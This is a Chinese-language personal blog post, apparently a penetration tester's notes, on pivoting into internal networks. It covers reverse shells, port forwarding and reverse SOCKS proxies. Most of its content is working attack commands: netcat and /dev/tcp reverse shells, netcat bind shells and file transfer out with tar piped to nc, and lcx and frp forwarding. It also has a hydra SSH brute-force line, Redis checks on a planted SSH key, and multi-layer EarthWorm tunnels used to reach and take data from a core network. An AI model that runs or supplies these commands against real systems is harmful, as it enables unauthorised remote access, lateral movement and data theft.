<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="keyword" content="">
    <meta name="theme-color" content="#600090">
    <meta name="msapplication-navbutton-color" content="#600090">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="#600090">
    <link rel="shortcut icon" href="https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-person-128.png">
    <link rel="alternate" type="application/atom+xml" title="pengpengp&#39;s BLOG" href="/atom.xml">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.css">
    <title>
        
        内网穿透工具｜undefined
        
    </title>

    <link rel="canonical" href="https://pengpengp.github.io/2019/03/10/内网穿透工具/">

    <!-- Bootstrap Core CSS -->
    
<link rel="stylesheet" href="/css/bootstrap.min.css">


    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/blog-style.css">


    <!-- Pygments Github CSS -->
    
<link rel="stylesheet" href="/css/syntax.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<style>

    header.intro-header {
        background-image: url('')
    }
</style>
<!-- hack iOS CSS :active style -->
<body ontouchstart="" class="animated fadeIn">
<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top " id="nav-top" data-ispost = "true" data-istags="false
" data-ishome = "false" >
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand animated pulse" href="/">
                <span class="brand-logo">
                    pengpengp&#39;s BLOG
                </span>
                's Blog
            </a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <!-- /.navbar-collapse -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>
					
                    
					
					
                </ul>
            </div>
        </div>
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
//    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>

<!-- Main Content -->

<!--only post-->


<img class="wechat-title-img"
     src="">


<style>
    
    header.intro-header {
        background-image: url('')
    }

    
</style>

<header class="intro-header">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1 text-center">
                <div class="post-heading">
                    <h1>内网穿透工具</h1>
                    
                    <span class="meta">
                         作者 pengpengp
                        <span>
                          日期 2019-03-10
                         </span>
                    </span>
                    <div class="tags text-center">
                        
                        <a class="tag" href="/tags/#内网转发"
                           title="内网转发">内网转发</a>
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="post-title-haojen">
        <span>
            内网穿透工具
        </span>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">
            <!-- Post Container -->
            <div class="col-lg-8 col-lg-offset-1 col-sm-9 post-container">
                <h2 id="内网转发的三种：反弹shell、反弹端口、反弹代理"><a href="#内网转发的三种：反弹shell、反弹端口、反弹代理" class="headerlink" title="内网转发的三种：反弹shell、反弹端口、反弹代理"></a>内网转发的三种：反弹shell、反弹端口、反弹代理</h2><p>虚拟终端和bash -i的区别：</p>
<pre><code>bash -i是交互式的shell，很多程序都要求用交互式shell</code></pre>
<h1 id="一。反弹shell"><a href="#一。反弹shell" class="headerlink" title="一。反弹shell"></a>一。反弹shell</h1><blockquote>
<p>nc的使用：</p>
</blockquote>
<p>有两种方式：</p>
<p>1.被动连接(让被攻击者反弹到监听)<br>    powershell中反弹命令：<br>    <code>nc ip port -e cmd.exe</code><br>    <code>nc ip port -e /bin/bash</code><br>    <code>bash -i &gt;&amp;/dev/tcp/ip/port 0&gt;&amp;1</code></p>
<p><code>监听nc -lnvp port</code></p>
<p>2.主动连接(主动连接被攻击者)<br>    特点：攻击者不需要公网ip，但是被攻击的服务器必须在公网上<br>    被攻击：<br>    <code>nc -lnvp port -e cmd </code><br>    <code>nc -lnvp port -e /bin/bash</code><br>    攻击：<br>    <code>nc ip port</code></p>
<p>还有其他反弹的方式：如perl、php、python语言反弹<br><a target="_blank" rel="noopener" href="http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html">http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html</a></p>
<h1 id="二。反弹端口"><a href="#二。反弹端口" class="headerlink" title="二。反弹端口"></a>二。反弹端口</h1><p>流程：A出-&gt;B入-&gt;B出-&gt;C入（A为攻击者、B为getshell机器、C为内网被攻击者）    </p>
<p>工具：lcx(windows)、frp</p>
<blockquote>
<p>lcx工具的使用：</p>
</blockquote>
<pre><code>步骤一：外网服务器开启监听
lcx -listen 4444 12345
步骤二：将被控主机端口转发到外网服务器
lcx.exe –slave 公网 IP + 端口 被控服务器IP + 端口
lcx -slave 1.1.1.1 4444 127.0.0.1 80
步骤三：在外网服务器连接本地12345端口
然后mstsc 127.0.0.1:12345</code></pre>
<blockquote>
<p>用nc进行文件传输:</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">A:&#96;tar cfz - 文件名 | nc 10.0.1.162 9995&#96;</span><br><span class="line">B:&#96;nc -l 21000 | tar zxvf -&#96;</span><br><span class="line"></span><br><span class="line">nc的使用:https:&#x2F;&#x2F;www.cnblogs.com&#x2F;nmap&#x2F;p&#x2F;6148306.html</span><br></pre></td></tr></table></figure>





<blockquote>
<p>frp的使用</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">frpc.ini</span><br><span class="line">[common]</span><br><span class="line">bind_addr&#x3D;0.0.0.0</span><br><span class="line">bind_port &#x3D; 7000</span><br><span class="line">auto_token&#x3D;12345678（密码可以自己修改）</span><br><span class="line"></span><br><span class="line">dashboard_port &#x3D; 7500（网页登录端口）</span><br><span class="line">dashboard_user &#x3D; admin（网页登录账户）</span><br><span class="line">dashboard_pwd &#x3D; admin（网页登录密码）</span><br><span class="line">https:&#x2F;&#x2F;www.atsurak.com&#x2F;frp-windows-rdp&#x2F;</span><br></pre></td></tr></table></figure>





<blockquote>
<p>常见要扫描的端口：</p>
</blockquote>
<ul>
<li><p>22端口—爆破，无意义<br><code>hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh</code></p>
</li>
<li><p>80端口—http的注入</p>
</li>
<li><p>1433端口—mssql数据库</p>
</li>
<li><p>6379端口—外联<br>redis -cli -h ip -p port<br>config get dir 查看之前的设置路径<br>config get dbfilename 查看之前的创建文件<br>keys *查看之前创建的键，”key” “ssh”<br>get ssh查看之前的键值</p>
</li>
<li><p>8000端口—网站</p>
</li>
<li><p>9000端口—nginx漏洞<br>***找未授权类可以利用的端口，才有意义</p>
</li>
</ul>
<p>等等</p>
<hr>
<hr>
<h1 id="三。反弹代理"><a href="#三。反弹代理" class="headerlink" title="三。反弹代理"></a>三。反弹代理</h1><blockquote>
<p>ew工具的使用：</p>
</blockquote>
<ul>
<li>第1种方式.在中间人服务器使用<br><code>ew -s ssocksd -l 4444</code>—在服务器上监听一个端口，所有发送到这个端口的流量都将被此服务器转发，(类似shadowsocks)    </li>
</ul>
<ul>
<li>第2种方式.在攻击者和被攻击者服务器使用<pre><code>攻击者：ew -s rcsocks -l 1080 -e 6666
被攻击方：ew -s rssocks -d 192.168.11.123 -e 6666</code></pre>
</li>
</ul>
<p>多层内网穿透：</p>
<p>假设win2008R2在内网[无公网ip]并在一个独立的内网段,win2008也处在目标内网,假设在另一个内网段,centos 5.1同样也处在内网,可又在另一个单独的内网段且win2008R2能访问win2008,win2008能访问centos 5.1,而centos 5.1能访问目标核心网,要实现层层穿透,访问到核心网资源,我们就可以这样</p>
<p>1.先在win7[vps]上执行,把来自外部的1080端口流量转到本地的1235端口上</p>
<p><code>./ew_for_Win.exe -s rcsocks -l 1080 -e 1235</code></p>
<p>2.在内网入口上执行,把win7[vps]的1235端口和内网win2008的3456端口绑定</p>
<p><code>ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1235 -f 192.168.32.170 -g 3456</code></p>
<p>3.在内网二层数据库服务器上执行,将来自外部的1236端口和本地的3456端口进行绑定<br><code>./ew_for_Win.exe -s lcx_listen -l 3456 -e 1236</code></p>
<p>4.在最里层的linux上执行,将本地的socks连接反弹到win2008的1236端口上,此时再回到win2008上看会提示”rssocks cmd_socket OK!”,说明通道已经建立成功<br><code>./ew_for_Linux32 -s rssocks -d 192.168.32.170 -e 1236</code></p>
<p>5.最后,再回到win7[vps]上利用Proxifier访问本地的1080就相当于访问centos 5.1的1236端口,即可轻松获取核心网的数据    </p>
<blockquote>
<p>对应的代理工具使用：</p>
</blockquote>
<p>1.proxifier</p>
<p>2.SocksCap64    </p>
<p>3.proxyChains工具</p>
<p>​    用代理时nmap -sT -Pn ip才能扫描到<br>​        linux设置全局：</p>
<p>​    <code>alias proxy=&#39;export all_proxy=socks5://127.0.0.1:1086&#39;</code><br>​        <code>alias unproxy=&#39;unset all_proxy&#39;</code><br>​                    </p>

                <hr>
                

                <ul class="pager">
                    
                    <li class="previous">
                        <a href="/2019/03/16/常用渗透工具/" data-toggle="tooltip" data-placement="top"
                           title="常用渗透工具">&larr; Previous Post</a>
                    </li>
                    
                    
                    <li class="next">
                        <a href="/2019/03/03/提权/" data-toggle="tooltip" data-placement="top"
                           title="提权">Next Post &rarr;</a>
                    </li>
                    
                </ul>

                

                


                <!--加入新的评论系统-->
                

                

            </div>

            <div class="hidden-xs col-sm-3 toc-col">
                <div class="toc-wrap">
                    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91%E7%9A%84%E4%B8%89%E7%A7%8D%EF%BC%9A%E5%8F%8D%E5%BC%B9shell%E3%80%81%E5%8F%8D%E5%BC%B9%E7%AB%AF%E5%8F%A3%E3%80%81%E5%8F%8D%E5%BC%B9%E4%BB%A3%E7%90%86"><span class="toc-text">内网转发的三种：反弹shell、反弹端口、反弹代理</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%82%E5%8F%8D%E5%BC%B9shell"><span class="toc-text">一。反弹shell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%82%E5%8F%8D%E5%BC%B9%E7%AB%AF%E5%8F%A3"><span class="toc-text">二。反弹端口</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%89%E3%80%82%E5%8F%8D%E5%BC%B9%E4%BB%A3%E7%90%86"><span class="toc-text">三。反弹代理</span></a>
                </div>
            </div>
        </div>

        <div class="row">
            <!-- Sidebar Container -->

            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                

                <!-- Friends Blog -->
                
            </div>
        </div>

    </div>
</article>







<!-- Footer -->
<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1 text-center">
                <br>
                <ul class="list-inline text-center">
                
                
                

                

                

                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; pengpengp&#39;s BLOG 2020
                    <br>
                    <span id="busuanzi_container_site_pv" style="font-size: 12px;">PV: <span id="busuanzi_value_site_pv"></span> Times</span>
                    <br>
                    Theme by <a target="_blank" rel="noopener" href="https://haojen.github.io/">Haojen Ma</a>
                </p>

            </div>
        </div>
    </div>
</footer>

<!-- jQuery -->

<script src="/js/jquery.min.js"></script>


<!-- Bootstrap Core JavaScript -->

<script src="/js/bootstrap.min.js"></script>


<!-- Custom Theme JavaScript -->

<script src="/js/blog.js"></script>


<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>

<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("https://pengpengp.github.io/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>



<!-- Google Analytics -->



<!-- Baidu Tongji -->


<!-- swiftype -->
<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
  (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
  e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install','','2.0.0');
</script>

<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<!--wechat title img-->
<img class="wechat-title-img" src="">
</body>

</html>
